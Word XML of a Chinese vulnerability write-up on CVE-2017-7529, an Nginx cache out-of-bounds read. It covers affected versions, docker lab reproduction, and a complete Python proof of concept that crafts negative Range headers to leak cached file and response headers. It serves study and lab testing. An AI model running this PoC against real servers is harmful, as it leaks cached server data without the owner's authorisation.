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ve-2017-7529nginx-越界读取缓存漏洞"/>
      <w:r>
        <w:t xml:space="preserve">（CVE-2017-7529）Nginx 越界读取缓存漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="一漏洞简介"/>
      <w:r>
        <w:t xml:space="preserve">一、漏洞简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nginx在反向代理站点的时候，通常会将一些文件进行缓存，特别是静态文件。缓存的部分存储在文件中，每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件，则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">如果我的请求中包含Range头，Nginx将会根据我指定的start和end位置，返回指定长度的内容。而如果我构造了两个负的位置，如(-600, -9223372036854774591)，将可能读取到负位置的数据。如果这次请求又命中了缓存文件，则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="二漏洞影响"/>
      <w:r>
        <w:t xml:space="preserve">二、漏洞影响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Nginx Nginx:1.13.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nginx Nginx:1.13.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nginx Nginx:1.13.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nginx Nginx:1.11.13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nginx Nginx:1.11.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="三复现过程"/>
      <w:r>
        <w:t xml:space="preserve">三、复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">运行测试环境：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.0-sec.org:8080/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，即可查看到Nginx默认页面，这个页面实际上是反向代理的8081端口的内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 poc.py http://www.0-sec.org:8080/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，读取返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="6356221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wiki.0-sec.org/img/20200419/cd0e26651c0347e9afb4faaad1fa70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可见，越界读取到了位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">如果读取有误，请调整poc.py中的偏移地址（605）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="poc"/>
      <w:r>
        <w:t xml:space="preserve">poc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import sys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import requests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">if len(sys.argv) &lt; 2:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("%s url" % (sys.argv[0]))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    sys.exit()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">headers = {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"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offset = 605</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">url = sys.argv[1]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file_len = len(requests.get(url, headers=headers).content)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">n = file_len + offset</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">headers['Range'] = "bytes=-%d,-%d" % (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    n, 0x8000000000000000 - n)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">r = requests.get(url, headers=headers)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">print(r.text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="参考链接"/>
      <w:r>
        <w:t xml:space="preserve">参考链接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">https://vulhub.org/#/environments/nginx/CVE-2017-7529/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2020-09-15T08:01:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-15T08:01:16Z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